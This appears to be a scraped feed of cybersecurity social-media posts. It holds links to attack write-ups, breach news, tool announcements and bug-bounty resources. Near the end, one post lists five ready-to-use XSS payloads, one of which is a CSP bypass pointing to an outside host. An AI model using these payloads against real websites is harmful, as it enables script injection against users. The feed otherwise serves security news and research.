a whole new vibe DEF CON

Attacking UNIX Systems via CUPS, Part I evilsocket.net/2024/09/26/Att…

💡Linux Boot Process Explained

A Threat Actor is Allegedly Selling Sensitive Data of Romanian Citizens darkwebinformer.com/a-threat-actor…

💡Many don't know about Gwern, but it's a treasure! Link: https://gwern[.]net/dnm-archive The author writes: From between 2013–2015, I scraped/mirrored on a weekly or daily basis all existing English-language DNMs as part of my research into their usage,

BREAKING: Internal #DeepSeek database publicly exposed 🚨 Wiz Research has discovered "DeepLeak" - a publicly accessible ClickHouse database belonging to DeepSeek, exposing highly sensitive information, including secret keys, plain-text chat messages, backend details, and logs.

Today Lockbit ransomware group issued a message to Kash Patel, the new Director of the United States Federal Bureau of Investigation. He requested Kash Patel contact him via Tox and offered him a file titled "personal_gift_for_new_director_FBI_Kash_Patel.7z". The file is

#historic

I analyzed thousands of messages from 35+ suspected state-sponsored hacktivist groups using machine learning—uncovering hidden connections through writing styles, language and topics. After a year of research, here’s what we found and how we did it. 👇 research.checkpoint.com/2025/modern-ap… 1/

🟢 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 𝗪𝗶𝘇𝗮𝗿𝗱 An advanced AI assistant utilizing GPT language models to interpret and generate cybersecurity payloads 🔗 payload-wizard.vercel.app

Interesting new trend: Red teamers sending me YARA rules targeting in-memory implants of their despised competitor's C2 framework. Good… Good! Let the hate flow through you.

./Phone : a mobile phone forensic framework for security researchers and forensic experts. It's now available on github, follow the instructions and you will get it up and running successfully. github.com/cyb3rfortr3ss/…

⚡AllForOne allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories. 🚨github.com/AggressiveUser… ✅Join Telegram For More - t.me/brutsecurity/1… #BugBounty #SecurityResearch #NucleiTemplates #AllForOne

📔 Pentest Interview Playbook 📔 I’m writing an entire book on passing pentest interviews. From resume to offer. It’s almost ready. I’ve worked as a pentester, launched my own firm, and interviewed and hired pentesters myself. This book breaks down every stage of the

Want to master client-side bugs? 😎 Check out this extensive GitHub repository with tens of different resources curated by Hazem El-Sayed 🇵🇸! 🔗 github.com/zomasec/client…

Google has quietly open-sourced a full-stack research agent stack, powered by Gemini and LangGraph. It's capable of multi-step web search, reflection, and synthesis. While not confirmed to match Gemini’s production backend, it's strikingly close. github.com/google-gemini/…

API Hacking - Cracking JWT Tokens ghostlulz.com/blog/api-hacki… Pre Account Takeover ghostlulz.com/blog/pre-accou… XSS With Polyglots ghostlulz.com/blog/smart-xss… React JS SourceMaps to XSS ghostlulz.com/blog/reactjs-s… Bypass AI Powered Wafs ghostlulz.com/blog/bypass-ai… #bugbounty #bugbountytips

🚨 NEW PAPER on the 0day Supply Chain 🚨: I gathered open source data & interviewed Gov employees, VR and China researchers to figure out what the zero day marketplace looks like in the U.S. and how it compares to China. Key findings below ⬇️ 0/🧵 atlanticcouncil.org/in-depth-resea…

Top 5 KNOXSS XSS Vectors Main and Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm(1)?.(1)//\ #infosec

Disagree with us and we’ll dance on your grave.